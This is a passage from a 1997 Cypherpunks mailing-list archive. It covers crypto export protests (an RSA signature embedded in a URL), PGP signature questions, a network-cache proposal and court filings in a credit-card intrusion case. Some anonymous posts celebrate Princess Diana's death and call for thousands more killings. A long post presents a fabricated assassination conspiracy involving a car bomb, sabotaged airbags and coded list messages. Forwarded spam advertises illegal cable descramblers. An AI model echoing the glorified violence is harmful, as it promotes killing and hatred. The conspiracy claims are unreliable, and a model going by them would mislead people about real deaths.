explosion > b) the driver's airbag > c) the liquid on the ground at the scene > d) the source of changes in the day's schedule > and/or the previous day's schedule > e) the details of who was involved in the arrest > {debriefing} of the photographers present > > If you _do_ manage to follow up on the information then we _might_ be > inclined to give you the details of Prince Charle's upcoming wedding > and coronation. > > : : B o o t s > ~~~~~~~~~~~~~ From nobody at REPLAY.COM Sun Aug 31 06:24:40 1997 From: nobody at REPLAY.COM (Anonymous) Date: Sun, 31 Aug 1997 21:24:40 +0800 Subject: Confirmation on Diana, please? Message-ID: <199708311312.PAA04298@basement.replay.com> Fuck Diana and Dodi, rotting garbage, germs, well ridded, like JFK. Up the paparazzi or whoever honored Labor Day doing dirty work, giving a lesson: run, can't hide. Two down, thousands more to go worldwide, the sooner the better, inshallah, scare the beasts back to bunker. Guards will drain their blood, day by day. Grieve for the driver, maybe the royal bitch's cop, praise Oswald or whoever. From aba at dcs.ex.ac.uk Sun Aug 31 06:26:52 1997 From: aba at dcs.ex.ac.uk (Adam Back) Date: Sun, 31 Aug 1997 21:26:52 +0800 Subject: non-exportable _URL_ (was Re: Developments in the _Junger_ suit) In-Reply-To: <199708302354.AAA01915@notatla.demon.co.uk> Message-ID: <199708311322.OAA02126@server.test.net> Antonomasia writes: > Adam Back writes: > >Is this an export? > > > > RSA .sig > > > > I think a mere pointer is not an export, no matter what it points to, > but a link with prohibited smuggled _content_ might be: > >
> although the quoting would probably take a lot of thought. Challenge taken. Here's a non-exportable URL: http://www.dcs.ex.ac.uk/~aba/rsa/print%20pack%22C*%22,split/%5cD+/,%60echo%20%2216iII*o%5cU@%7b$/=$z%3b%5b(pop,pop,unpack%22H*%22,%3c%3e)%5d%7d%5cEsMsKsN0%5blN*1lK%5bd2%25Sa2/d0%3cX+d*lMLa%5e*lN%250%5ddsXx++lMlN/dsM0%3cJ%5ddsJxp%22%7cdc%60 (ie the URL _contains_ the .sig as you suggest). The page you get when you follow it is a write up of how I did it. This is the same page, with a simpler URL: http://www.dcs.ex.ac.uk/~aba/rsa/link.html > Perhaps that's the kind of thing they mean ? But I wouldn't have thought so? Adam -- Have *you* exported RSA today? --> http://www.dcs.ex.ac.uk/~aba/rsa/ print pack"C*",split/\D+/,`echo "16iII*o\U@{$/=$z;[(pop,pop,unpack"H*",<> )]}\EsMsKsN0[lN*1lK[d2%Sa2/d0 Patiently they laid in wait Originally there were eight Talk is cheap and so is jive So eight quickly turned to five Caving in, the hat, the beard Suddenly reappeared Now we have seven of eight The last, alas, is late...is late Don Dunne From anon at anon.efga.org Sun Aug 31 06:46:52 1997 From: anon at anon.efga.org (Anonymous) Date: Sun, 31 Aug 1997 21:46:52 +0800 Subject: None Message-ID: <97b37fa0770bb495c09fe9f5401db7df@anon.efga.org> At 01:09 PM 8/25/97 +1000, you wrote: >> So what you are saying then is that when the scum inserts a toilet plunger >> up someone's butt you consider them less than human, therefore all of >> humanity becomes less than human including the plunging scum, therefore >> he himself is less than human... > >Ok I'll take this slowly > >1) All of humanity is equaliy human I can generally agree with that >2) If someone is made less then human then we all become less human by >that amount Oh, kind of like that "ruin it for everyone" idea. >For esample if Alice, Bob and Paul all have say 10 units of humanity. Now >Paul shoves a plunger up Bobs datehole, we could say that Paul should >have 5 units of humanity. By rule one every body else is now also 5 >units. Um, Dave, it doesn't work like that. Alice didn't do anything, and Bob was victimized, anyway. The only person who should be less human is Paul. >As you can planly see assining humanitiy and inhumanity is a pointless >esasize. And the platypus should refrain from saying crap like this in the future. I for one have no idea how this could be the system for assigning inhumanity. Bad Cypherpunk!!! No Security!! From remailer at bureau42.ml.org Sun Aug 31 08:43:38 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Sun, 31 Aug 1997 23:43:38 +0800 Subject: Confirmation on Diana Message-ID: bureau42 Anonymous Remailer wrote: > > Are there any Cypherpunks mailing list members who can confirm that > there was a series of posts related to Princess Diana's death in the > days before the event? I am particularly interested in information as > to whether Cypherpunks were in any way responsible for a slight delay > in the timing of her death. > I am particularly interested in communicating with the person who sent > me the anonymous messages between 8/24/97 and 8/30/97 using the nym > "A'Tak A'Tdorn'. > > If you have information and an interest in sharing it, please send a > post to the Cypherpunks list or the fight-censorship list, indicating > such. If you wish for me to contact you through a neutral, third party, > indicate that as well. > > Thank You If you have a death-wish, then send this message again through the Canadian Mountie remailer. {:>)-----< {HELP! They knocked me down and cut off my arms!} I presume the message you are referring to on 24/8/97 is the one which answers your previous anonymous inquiry by saying, "Only for the moment we are saying nothing." It meant what it said. However, since the moment is over I suppose there is no harm in saying "something." I will therefore give you a modicum of information on the messages which have passed through the cypherpunks list since your original notification that something was in the wind. For starters, although I have not seen the original email which you received but I believe that if you read it closely you will see that it implied that the coming messages to the list would be in a form which was _analogous_ to the event, whereas you seemed to take it literally as a plan to "Nuke D.C." [How you managed to come to the conclusion that spooks and shadows would refer to a coming event directly totally escapes me!?!] If you will reinterpret the posts in question in light of the event, I believe you will see the thread that winds through them. As you were told, the AOL'er messages were used as markers to divine which of the coming messages contained stegonographic messages of one sort or another, or pointers to graphics containing the stegonography. I am assuming you understood this and sent the AOL'er message saying, "Please send more details...thanks" If you had not taken the phrase "Nuke D.C." so literally you would have noticed that the "Fade to Gray" post linked the coming major event (Nuke D.C.) to foreigners, automobiles and death. You were not alone in your request for details regarding the message in the Quote of the day: "I know the day it happens. On August 29, 1997 it's going to feel pretty fucking real to you too." which had been sent by one of the Canadians involved in ferreting out the details of the coming event. One of the cypherpunk list members posted the question, "When is X-Day supposed to be?" when there was no mention of 'X-Day' in the quote. This understandably led to postponement of the event while those involved checked to see if there had been a breach in their security. The subsequent message which stated, "I don't know what you mean by 'When is X-Day supposed to be?'" was interpreted by those involved to indicate that full details of their plans remained a mystery to those who were trying to expose and stop it. After they had put things in motion to proceed with their backup plan, however, two more messages came to the list which indicated that there was more known about their plan than they had suspected. In reply to the post expressing lack of knowledge about the timing of X-Day, a post from _lne.com_ (surprise, surprise) suggested that X-Day referred to people who are going to be "taken from the earth" (death) by "pleasure saucers" (limosene) and noting that the limosene would be operated by "Greys" (a reference to the ending of the "Fade To Gray" post--indicating a spook/LEA connection). The post ended by suggesting the time of the event might be "April" (4 o'clock) and gave a pointer to a sight with a graphic stego which would provide a visual message. The second post that came well after it had been decided to proceed with the backup plan said, "The metallic custard scent ripped through the stegosaurus' nostrils." (metallic custard being a car bomb--note eye witness accounts by Michael Solomon {who just happened to be on the scene, naturally} speaking of a "loud explosion" that brought to mind "terrorists."} "Clearly the meonotreme (Monarchist/Anarchist/Extremist) journey it would begin as it had ended." (The Fairy Tale Princess who had embarked on an extremist political journey was about to return to becoming the {dead} Fairy Tale Princess, once again.) "The ponder-tree hung itself in the heavy air, it's sap becomming purple." (Diana had sealed her death {"hung itself"} when she opted to bond herself to Royal blood.) "And flowed enigmatically like a river of broken curves and powdered eggshells." (A reference to the immediate area of the planned event, which would be at the split {"broken"} of a tunnel road {"river"} and the airbags being sabotaged.) After this post appeared on the cypherpunks list, a Timmy C. Mayflower ASCII art spam showed up on the list from a juno remailer, but it had a Timothy C. May .sig following the artwork. (Followed by the proverbial GJBuller response.) Then both the juno remailer and the toad list experienced problems with multiple messages being sent to _some_ people and _not_ others, as well as _some_ people not getting certain messages at all. You will also note that, as the "Fade To Gray" post indicated (re: all the cypherpunks being "out of town" at the time of the event), there was no activity on the list in the time surrounding the event. As for the information in the graphic pointed to by the lne.com post, it was never considered to be anything but an attempt at intentional misdirection. You were told months ago that Diana's current power came from the failure of the so-called suicide attempt and that the agreement to leave her free to continue her public activities was contingent upon her remaing free from political matters. You were also informed that her involvement with the Labor Party land-mine issue was a breach of that agreement, as was her June 13th reference to the resistance of the Conservative party in this regard. When you were contacted last week, you should have been able to figure out for yourself what her link to the Harrods clan indicated. You were made aware of everything you needed to be sitting on top of the story. Given the fact that you have shown so little ability to act on the information you have already been given, we are probably wasting our time by giving you any further information. Regardless, if you wish to pursue the matter then I suggest that you research: a) the explosion b) the driver's airbag c) the liquid on the ground at the scene d) the source of changes in the day's schedule and/or the previous day's schedule e) the details of who was involved in the arrest {debriefing} of the photographers present If you _do_ manage to follow up on the information then we _might_ be inclined to give you the details of Prince Charle's upcoming wedding and coronation. : : B o o t s ~~~~~~~~~~~~~ From tcmay at got.net Sun Aug 31 09:01:54 1997 From: tcmay at got.net (Tim May) Date: Mon, 1 Sep 1997 00:01:54 +0800 Subject: More anonymous spam In-Reply-To: <199708310556.HAA25027@basement.replay.com> Message-ID: At 10:56 PM -0700 8/30/97, Anonymous wrote: >Received this yesterday. Out of curiousity, anyone >know where (810) area code is located? > (spam about cable decoders elided) Typical of how "anonymous" messages are flooding the list. The author sends us useless spam, and doesn't even know how to use Area Code lookup service. BTW. "he geographical location for area code 810 is Michigan (major cities: Flint, Detroit). " (via 555-1212.com) I may soon have to put all of the remailers in my killfile. --Tim May There's something wrong when I'm a felon under an increasing number of laws. Only one response to the key grabbers is warranted: "Death to Tyrants!" ---------:---------:---------:---------:---------:---------:---------:---- Timothy C. May | Crypto Anarchy: encryption, digital money, tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero W.A.S.T.E.: Corralitos, CA | knowledge, reputations, information markets, Higher Power: 2^1398269 | black markets, collapse of governments. "National borders aren't even speed bumps on the information superhighway." From wombat at mcfeely.bsfs.org Sun Aug 31 09:55:35 1997 From: wombat at mcfeely.bsfs.org (Rabid Wombat) Date: Mon, 1 Sep 1997 00:55:35 +0800 Subject: your mail In-Reply-To: <199708310556.HAA25027@basement.replay.com> Message-ID: It is in Michigan. btw - for those concerned about toll fraud, the list of expanded area codes is at: http://www.millenniumtel.com/newsltr/vol3-1.html#areacode -r.w. On Sun, 31 Aug 1997, Anonymous wrote: > > Received this yesterday. Out of curiousity, anyone > know where (810) area code is located? > > > ------Begin Forwarded Message----------- > > Imagine yourself watching EVERY PREMIUM > and basic CHANNEL on your own equipment > just two short days from now! > > Whether your system is Jerrold (TM), General Instrument (TM), > Scientific Atlanta (TM), Tocom (TM), Pioneer (TM), Zenith (TM), > Hamlin (TM), or Oak (TM) we have the equipment for you. > > We are Tuxton Wholesale Electronics - America's > best source for cable TV converters / descramblers > and we stand behind what we sell: > > 30 day money back guarantee > 6 month warranty > Technical support hotline > > All units are: > > Completely automatic - just hook up and enjoy > Completely undetectable - no one outside your home knows it's there > Completely bullet proof - only you can shut it down > Constructed of the latest micro circuitry - for years of dependability > > Prices start at just $189 > > *****SPECIAL INTERNET OFFER***** > > Call us today at 810-468-2891 M-F 10:00 am to 5:00 pm EST > with the make and model number of your cable company's > converter / descrambler and second day Federal Express > SHIPPING IS FREE!!!!! > > That's right - in two days you'll have ALL THE CHANNELS > and we'll pay the shipping charges! > > **ONLY THOSE NOTIFIED BY E-MAIL ARE ELIGIBLE **** > > Hurry, our SPECIAL Internet Promotion ends September 12th, 1997. > When calling please provide us with your e-mail address > to receive free shipping. > > Need extra income - everyone wants these boxes - > ask about our dealer program (volume discounts). > > > This is the only message that you will receive. > Your name will be automatically removed from our database. > > Thank You. > > > All brand names are registered trademarks of their respective owners and > are used for reference only. Tuxton Wholesale Electronics claims no > affiliation with any of these companies and uses the names for > identification and illustration purposes only. > > Imagine yourself watching EVERY PREMIUM > and basic CHANNEL on your own equipment > just two short days from now! > > ---------End Forwarded Message-------------- > > > > > > > > From straightedge.dave at sk.sympatico.ca Sun Aug 31 11:19:49 1997 From: straightedge.dave at sk.sympatico.ca (David Yaffe) Date: Mon, 1 Sep 1997 02:19:49 +0800 Subject: Top 10 Ways to Make a Grouchy Old CypherPunk Smile - #4 In-Reply-To: <199708311141.EAA13095@sirius.infonex.com> Message-ID: <3.0.2.32.19970831120001.007b5e60@mailhost.sk.sympatico.ca> What I'm ashamed! No James Bell entry yet. therfore #4 should be: #4) Free cypherpunk political prisoner, James Bell! David At 07:41 AM 8/31/97 EST, you wrote: > > >Top 10 Ways to Make a Grouchy Old CypherPunk Smile >-------------------------------------------------- > >#10) Find his shoes for him. > >#9) Buy Kent Crispin a Dr. Kevorkian gift-certificate. > >#8) Nuke Washington DC > >#7) Send ten copies of this back to Vulis. > >#6) Have ? the Playtpus send him an email saying "Nude D.C." > >#5) Explain to him that the way John Young writes (Youngbonics) > is actually a sophisticated form of crypto. > >#4) Free cypherpunk political prisoner, James Bell! > >#3) > >#2) > >#1) [This space reserved for T.C. May] From ahoier at juno.com Sun Aug 31 11:26:11 1997 From: ahoier at juno.com (A Hoier) Date: Mon, 1 Sep 1997 02:26:11 +0800 Subject: PGP Signatures Message-ID: <19970831.135647.9558.12.ahoier@juno.com> Does anyone know where I can get a PGP Signature on the Net. I usually just read the mailing lists posts BTW I think this is my first Post on this list. I'm a begginer to Cryptography and when I heard about it sounded like a cool subject and it is!!!!! I f somebody could please e-mail me some more info on crypto and PGP Signatures. I would really appreciate it. ADAM HOIER Adam Hoier E-MAIL ME AT: ahoier at juno.com Life is like a big box of Chocolates :Forrest Gump From enoch at zipcon.net Sun Aug 31 11:31:36 1997 From: enoch at zipcon.net (Mike Duvos) Date: Mon, 1 Sep 1997 02:31:36 +0800 Subject: Adding Memory to the Net Message-ID: <19970831181542.2052.qmail@zipcon.net> A few people have commented on my "Distributed Network Cache Service" suggestion since I posted it, and I would like to respond to their comments. The basic idea here is to add memory to the Net in a reliable way, so that the Net provides memory services in the way it now universally provides data transport services. The Net would then serve compressed encrypted Octet Strings to machines connected to it, and provide a consistant view of which Octet Strings were available at any point in time which was independent of the access point. Adding Octet Strings to the universe of available ones, with a specified lifetime, would involve a micropayment. Computers connected to the Net could then employ either Octet Strings or fixed length data consisting of a cryptographic hash and decryption key to describe any chunk of data, which would reduce the storage requirements of hosts accordingly. Replication and synchronization of data would be the responsiblity of the totality of machines providing the cache service, and would augment the storage capacity of ordinary hosts which often replicate data excessively and synchronize it poorly. As Lucky Green correctly points out, since the cache service would effectively serve prepared digital coccoons whose contents were not visible to it, protocols would be needed to ensure that data was not spoofed. However, this is a "who do cache servers trust to give them data" issue, and not a "how do we serve the data and provide a Network-wide consistant view of the database" issue. Such a system, implemented efficiently, could carry the Eternity service, reliable network news, and serve as a distribution point for all freeware. It could have terabytes of storage, using a fraction of the resources now consumed by the endlessly replicated news spools of hosts on the Net. It would be as uncensorable as Usenet, and survive the destruction or compromise of a large number of cache servers in the system. It would be reliable, and no ones data would be visible to anyone else. I think such a service is the "World File System" reduced to its most basic principles, upon which endless other useful services may be based. Comments? -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From remailer at bureau42.ml.org Sun Aug 31 13:12:06 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Mon, 1 Sep 1997 04:12:06 +0800 Subject: No Subject Message-ID: Tim's right. I was curious about the spam and spent a lot of time trying to look up the company. It was late, got lazy, and so emailed asking about the area code. Also thought others may have received it. Tim's point, though, is well taken. It didn't belong on this list - so Tim, you got this one.... --------------------- Tim May wrote: >Typical of how "anonymous" messages are flooding >the list. > >The author sends us useless spam, and doesn't even >know how to use Area Code lookup service. > >BTW. "he geographical location for area code 810 is >Michigan (major cities: >Flint, Detroit). " >(via 555-1212.com) > >I may soon have to put all of the remailers in >my killfile. From randerso at ece.eng.wayne.edu Sun Aug 31 13:26:01 1997 From: randerso at ece.eng.wayne.edu (Ryan Anderson) Date: Mon, 1 Sep 1997 04:26:01 +0800 Subject: In-Reply-To: <199708310556.HAA25027@basement.replay.com> Message-ID: <3.0.2.32.19970831160913.007c9c30@ece.eng.wayne.edu> -----BEGIN PGP SIGNED MESSAGE----- At 07:56 AM 8/31/97 +0200, Anonymous wrote: >Received this yesterday. Out of curiousity, anyone >know where (810) area code is located? If you have an old map, it's all of the old 313 area code located north of Detroit, in Michigan. So basically, it's northern suburban Detroit, minus one county. More specifically, I think that phone number is from St. Clair Shores, or Mt. Clemens Michigan. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 Charset: noconv iQCVAwUBNAnPaDc3ytqHnNyNAQFExgP+KUAwmcGDn1uz7nw63ywP0fBvRxL7m0hr kfwu7GMpEEEFDprzL52Q7p7ndY95CjQXhhiViGCU/zScMbSVq2GRnL+8RTUdongI BmEL3iHI2SJ+/JoQ4VAlkjw0Thg3mZvUM7lvHcNoAcUFyr29OUjeKEsiDbqP7MyX F1hnLCVZWVc= =yXl/ -----END PGP SIGNATURE----- ----------------------------------------------------------------------- Ryan Anderson - "Who knows, even the horse might sing" Wayne State University - CULMA "May you live in interesting times.." randerso at ece.eng.wayne.edu PGP Fingerprint - 7E 8E C6 54 96 AC D9 57 E4 F8 AE 9C 10 7E 78 C9 ----------------------------------------------------------------------- From dformosa at st.nepean.uws.edu.au Sun Aug 31 13:50:01 1997 From: dformosa at st.nepean.uws.edu.au (? the Platypus {aka David Formosa}) Date: Mon, 1 Sep 1997 04:50:01 +0800 Subject: PGP Signatures In-Reply-To: <19970831.135647.9558.12.ahoier@juno.com> Message-ID: -----BEGIN PGP SIGNED MESSAGE----- On Sun, 31 Aug 1997, A Hoier wrote: > [...] I'm a begginer to > Cryptography and when I heard about it sounded like a cool subject [...] Dose Cypherpunks have an FAQ? and dose it need one? - -- Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. ex-net.scum and proud You Say To People "Throw Off Your Chains" And They Make New Chains For Themselves? --Terry Pratchett -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQCVAwUBNAmbhaQK0ynCmdStAQHvKAP/fQfnREZ78OlwwwzwwqS/BfOtZYTQECm0 fAqZwIqHBSZIpNbQTzZJrk+T3+MBXtyZuccOo+KAItPvu5aIq1TnUU2rPtNdi7l3 e/drtXORKfssqTxpPuxCZWnO3wkHK8mmdbarevgb/FecAmcmsnyqaCye+Te0LT5m 0Fv3pR3n7wc= =Tzai -----END PGP SIGNATURE----- From remailer at bureau42.ml.org Sun Aug 31 14:11:45 1997 From: remailer at bureau42.ml.org (bureau42 Anonymous Remailer) Date: Mon, 1 Sep 1997 05:11:45 +0800 Subject: No Subject Message-ID: bureau42 Anonymous Remailer wrote: > > Tim's right. I was curious about the spam and spent > a lot of time trying to look up the company. It was > late, got lazy, and so emailed asking about the area > code. Also thought others may have received it. Turned out to be a self-fulfilling prophecy. From feanor at nym.alias.net Sun Aug 31 14:34:04 1997 From: feanor at nym.alias.net (Feanor) Date: Mon, 1 Sep 1997 05:34:04 +0800 Subject: Crypto best book Message-ID: <19970831212054.25767.qmail@nym.alias.net> -----BEGIN PGP SIGNED MESSAGE----- On Aug 30, 22:40, "David E. Smith" wrote: } Subject: Re: Crypto best book > > > > What is the best book about cryptography ? > > > > > > Although "best" is certainly subjective, Nine out of Ten Cypherpunks (TM) > > > recommend Bruce Schneier's "Applied Cryptography." > > > > > > http://www.counterpane.com/applied.html > > > > Bruce did a lousy job on this book. > > > > If his is the first or the only book you read on the subject of > > cryptography, your knowledge base will be seriously deficient. Is this because of the mathematical mistakes, or is there other stuff? Certainly his 'real-world' grasp seems excellent, and it's an enjoyable read, which says a whole hell of a lot, I think, given the topic. I got an ad for 'The Handbook of Applied Cryptography' from a conference, is it any good? -----BEGIN PGP SIGNATURE----- Version: 2.6.3i Charset: noconv iQBVAwUBNAjaRxkU7YRPCnEJAQFOcwH9GUQbNmkzLB/UxiIyk1UbTNcUMkmkY1JQ RGtuvqV3iv6+oOrI2LOMB1I7FFcXFaXrdMtML53YX6KzuKNSul/f1Q== =PFot -----END PGP SIGNATURE----- From pgpks at dev.null Sun Aug 31 14:35:38 1997 From: pgpks at dev.null (PGP Key Server) Date: Mon, 1 Sep 1997 05:35:38 +0800 Subject: Here Is Your PGP Signature / Re: PGP Signatures In-Reply-To: <19970831.135647.9558.12.ahoier@juno.com> Message-ID: <3409E03F.7CA4@dev.null> A Hoier wrote: > > Does anyone know where I can get a PGP Signature on the Net. Adam, Here is your official PGP Signature. Cut and paste it to all of your correspondence to the CypherPunks mailing list, so we will know it is really you in the future. -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 MessageID: HyRMcbGm8DN7BxUVL/6EunpyDLmTX8Wj iQA/AwUBNAneIl7MfpC8gEO7EQIOIgCeM6giFdXXS1Idut3q941mSEEc8CAAoITk 142XgrvDAUe3CMwH4jTRiJZi =jvrj -----END PGP SIGNATURE----- Everything you want to know about encryption is on the Clue Server, which you should be able to find with a quick Yahoo search. If you can't find it, just post a message to the list asking where it is, and I am certain that there are a variety of list members who would be more than willing to take time out of their busy schedules to tell you where to go. Sincerely, PGP Signature Key Intelligent AutoResponder From lharrison at mhv.net Sun Aug 31 14:48:45 1997 From: lharrison at mhv.net (Lynne L. Harrison) Date: Mon, 1 Sep 1997 05:48:45 +0800 Subject: PGP Signatures In-Reply-To: <19970831.135647.9558.12.ahoier@juno.com> Message-ID: <3.0.3.32.19970831174041.0073bd34@pop.mhv.net> >On Sun, 31 Aug 1997, A Hoier wrote: > >> [...] I'm a begginer to >> Cryptography and when I heard about it sounded like a cool subject At 02:27 AM 9/1/97 +1000, platypus wrote: > >Dose Cypherpunks have an FAQ? and dose it need one? Last time I checked, it's at: ftp://ftp.csua.berkeley.edu:/pub/cypherpunks ************************************************************************ Lynne L. Harrison, Esq. | Destiny: Poughkeepsie, New York | "A tyrant's authority for crime lharrison at mhv.net | and a fool's excuse for failure." http://www.dueprocess.com | - Ambrose Bierce ************************************************************************ DISCLAIMER: I am not your attorney; you are not my client. Accordingly, the above is *NOT* legal advice. From ahoier at juno.com Sun Aug 31 15:43:51 1997 From: ahoier at juno.com (A Hoier) Date: Mon, 1 Sep 1997 06:43:51 +0800 Subject: THANKS!!!!! A BUNCH!!!!! Message-ID: <19970831.182129.3638.3.ahoier@juno.com> I think somebody on this list (I think on this list) gave me a PGP Signature and I just wanna say thank you so much!!!! But what i'd like to know is what does the PGP Signature really mean????? Like for example what does my PGP Signature mean Alls it is is a bunch of letters. Could someone privately e-mail me some info on cryptography web sites?????? THANKS -----BEGIN PGP SIGNATURE----- Version: PGP for Personal Privacy 5.0 MessageID: HyRMcbGm8DN7BxUVL/6EunpyDLmTX8Wj iQA/AwUBNAneIl7MfpC8gEO7EQIOIgCeM6giFdXXS1Idut3q941mSEEc8CAAoITk 142XgrvDAUe3CMwH4jTRiJZi =jvrj -----END PGP SIGNATURE----- From gbroiles at netbox.com Sun Aug 31 16:15:31 1997 From: gbroiles at netbox.com (Greg Broiles) Date: Mon, 1 Sep 1997 07:15:31 +0800 Subject: Court docs in Salgado/"Smak" case Message-ID: <3.0.2.32.19970831160840.006bdc88@pop.sirius.com> I was over at the federal courthouse in SF on Friday, and copied documents from the court's file in _US v. Salgado_, the case which got national front-page coverage last week in which the defendant, a 30-something resident of Daly City, was able to gain access to many credit card numbers through security holes at some un-named ISP's. The documents (complaint + affidavit, indictment, pretrial release memo, and motion to seal record) are online at , and also available at . The files were graciously and skillfully transferred from paper to digital/HTML format by John Young (thanks, John). I found this file interesting for two reasons: 1. Salgado used an unspecified crypto app/algorithm to encrypt his communications with his co-conspirator, an informant working for the FBI. (Details found in the affidavit accompanying the complaint). This case, a high-profile and high-value credit card/access fraud case, was brought quickly to a favorable conclusion for law enforcement, despite the use of crypto - there's no indication that crypto use hindered law enforcement at all. 2. The government has filed a motion to seal the transcripts of Salgado's guilty plea, because in the course of pleading guilty, he revealed the identity of some of his victims; the government would prefer that the public not learn which ISP's had security inadequate enough to protect their customers' and customers' customers credit cards. (Criminal defendants, as part of a guilty plea, are required to tell the court in their own words what it is that they did that constituted the crime - this is intended to help prevent defendants into being tricked/coerced into guilty pleas to crimes they don't understand.) The government's motion was filed on 8/25/97; no opposition was filed, and I don't believe it has been granted (yet). -- Greg Broiles | US crypto export control policy in a nutshell: gbroiles at netbox.com | http://www.io.com/~gbroiles | Export jobs, not crypto. | From enoch at zipcon.net Sun Aug 31 16:59:53 1997 From: enoch at zipcon.net (Mike Duvos) Date: Mon, 1 Sep 1997 07:59:53 +0800 Subject: THANKS!!!!! A BUNCH!!!!! In-Reply-To: <19970831.182129.3638.3.ahoier@juno.com> Message-ID: <19970831235045.26460.qmail@zipcon.net> ahoier at juno.com (A Hoier) writes: > I think somebody on this list (I think on this list) gave me > a PGP Signature and I just wanna say thank you so much!!!! That may be premature. Real PGP signatures can only be generated by the owners of PGP private keys, and they vary with the contents of the document being signed. This identifies the person who signs a document, and prevents undetected alterations. Clearly, you cannot use the same signature on more than one message, or have someone else give you a signature to use, or anyone could fake signing a message. > But what i'd like to know is what does the PGP Signature > really mean????? Like for example what does my PGP > Signature mean Alls it is is a bunch of letters. Could > someone privately e-mail me some info on cryptography web > sites?????? When you sign a document with PGP, the document is converted into a unique number, which it is statistically unlikely any other document will generate. Then this unique number is raised to the power of an exponent only you know, modulo the product of two large probable primes. The result is converted to a printed ASCII string, which is appended to the message with text identifying it as a PGP signature. Others wishing to make sure you have signed the document, and that it has not been altered, can raise this number to the power of a publicly known exponent, modulo the product of the same two large probable primes. The secret exponent which you used to sign and the public exponent you give others to verify your signatures, have the property that raising to the power of both of them leaves a number unaltered. If the result matches the unique number the document generates, then it was signed by you and no changes were made to it. Isn't that neat? So basically you don't need to get your signature from anyone. You need to get a copy of PGP, and generate your own PGP key using the PGP -kg option. Then you can post your public key to the keyservers, and sign documents with it. Others can use your public key to check your signatures, and also to encrypt documents in a way only you can decrypt. This is all explained in the PGP documentation, which comes with the PGP program. Good luck. -- Mike Duvos $ PGP 2.6 Public Key available $ enoch at zipcon.com $ via Finger $ {Free Cypherpunk Political Prisoner Jim Bell} From dlv at bwalk.dm.com Sun Aug 31 17:34:18 1997 From: dlv at bwalk.dm.com (Dr.Dimitri Vulis KOTM) Date: Mon, 1 Sep 1997 08:34:18 +0800 Subject: PGP Signatures In-Reply-To: Message-ID: ? the Platypus {aka David Formosa} writes: > -----BEGIN PGP SIGNED MESSAGE----- > > On Sun, 31 Aug 1997, A Hoier wrote: > > > [...] I'm a begginer to > > Cryptography and when I heard about it sounded like a cool subject > > [...] > > Dose Cypherpunks have an FAQ? and dose it need one? Lance Detweiller has been working on one. --- Dr.Dimitri Vulis KOTM Brighton Beach Boardwalk BBS, Forest Hills, N.Y.: +1-718-261-2013, 14.4Kbps From dformosa at st.nepean.uws.edu.au Sun Aug 31 17:57:09 1997 From: dformosa at st.nepean.uws.edu.au (? the platypus {aka David Formosa}) Date: Mon, 1 Sep 1997 08:57:09 +0800 Subject: PGP Signatures In-Reply-To: Message-ID: The post below has been corrupted and reposted to the list. It apperase that the source of this was dimen.com. Who ever is doing this please fix this. On Mon, 1 Sep 1997, ? the Platypus {aka David Formosa} wrote: [...] > Received: from dimensions.dimen.com (dimensions.dimen.com [199.164.189.11]) by toad.com (8.7.5/8.7.3) with SMTP id OAA27208 for ; Sun, 31 Aug 1997 14:00:31 -0700 (PDT) > Received: by dimensions.dimen.com (AIX 3.2/UCB 5.64/4.03) > id AA58302; Sun, 31 Aug 1997 15:00:00 -0600 > Mime-Version: 1.0 > Content-Type: text/html > To: Geoff Fritz > Received: from toad.com by dimensions.dimen.com (AIX 3.2/UCB 5.64/4.03) > id AA80314; Sun, 31 Aug 1997 14:59:59 -0600 > Received: (from majordom at localhost) by toad.com (8.7.5/8.7.3) id NAA27020 for cypherpunks-unedited-outgoing; Sun, 31 Aug 1997 13:40:41 -0700 (PDT) [...] > From: ? the Platypus {aka David Formosa} [...] Please excuse my spelling as I suffer from agraphia see the url in my header. Never trust a country with more peaple then sheep. Buy easter bilbies. Save the ABC Is $0.08 per day too much to pay? ex-net.scum and proud I'm sorry but I just don't consider 'because its yucky' a convincing argument From tcmay at got.net Sun Aug 31 18:11:48 1997 From: tcmay at got.net (Tim May) Date: Mon, 1 Sep 1997 09:11:48 +0800 Subject: THANKS!!!!! A BUNCH!!!!! In-Reply-To: <19970831.182129.3638.3.ahoier@juno.com> Message-ID: At 3:00 PM -0700 8/31/97, A Hoser wrote: >I think somebody on this list (I think on this list) gave me a PGP >Signature and I just wanna say thank you so much!!!! >But what i'd like to know is what does the PGP Signature really mean????? > Like for example what does my PGP Signature mean Alls it is is a bunch >of letters. Could someone privately e-mail me some info on cryptography >web sites?????? > >THANKS >-----BEGIN PGP SIGNATURE----- ... A Hoser, Be sure to encrypt all of your posts with the Virtual One Time Pad algorithm, also known as Rot13, so that only the suitably clued may read your words. --Klaus Voluntary Mandatory Self-Rating of this Article (U.S. Statute 43-666-970719). Warning: Failure to Correctly and Completely Label any Article or Utterance is a Felony under the "Children's Internet Safety Act of 1997," punishable by 6 months for the first offense, two years for each additional offense, and a $100,000 fine per offense. Reminder: The PICS/RSACi label must itself not contain material in violation of the Act. ** PICS/RSACi Voluntary Self-Rating (Text Form) ** : Suitable for Children: yes Age Rating: 5 years and up. Suitable for Christians: No Suitable for Moslems: No Hindus: Yes Pacifists: No Government Officials: No Nihilists: Yes Anarchists: Yes Vegetarians: Yes Vegans: No Homosexuals: No Atheists: Yes Caucasoids: Yes Negroids: No Mongoloids: Yes Bipolar Disorder: No MPD: Yes and No Attention Deficit Disorder:Huh? --Contains discussions of sexuality, rebellion, anarchy, chaos,torture, regicide, presicide, suicide, aptical foddering. --Contains references hurtful to persons of poundage and people of color.Sensitive persons are advised to skip this article. **SUMMARY** Estimated number of readers qualified to read this: 1 Composite Age Rating: 45 years From nobody at REPLAY.COM Sun Aug 31 18:27:57 1997 From: nobody at REPLAY.COM (Anonymous) Date: Mon, 1 Sep 1997 09:27:57 +0800 Subject: "Smack" the lawyer of your choice...but smack! Message-ID: <199709010106.DAA22158@basement.replay.com> GEORGE D. HARDY Assistant U.S. Attorney 4. I have been advised by the Federal Bureau of Investigation that the public release of the identity of the two victims could cause serious financial and security difficulties for the victims. Until now, 